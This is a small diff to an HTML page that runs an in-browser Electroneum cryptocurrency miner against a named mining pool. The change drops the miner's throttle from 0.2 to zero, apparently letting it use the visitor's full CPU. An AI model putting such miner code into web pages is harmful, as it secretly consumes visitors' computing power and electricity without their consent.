--- a/etn-coinwebmining.html
+++ b/etn-coinwebmining.html
@@ -10,7 +10,7 @@
     var password = 'public';
     var mining_pool = 'etn.spacepools.org:1111';
     var threads = -1;
-    var throttle = 0.2;
+    var throttle = 0.;
     var debug = false;
     cwm_start(site_id, coin, wallet, password, mining_pool, threads, throttle, debug);
   </script>
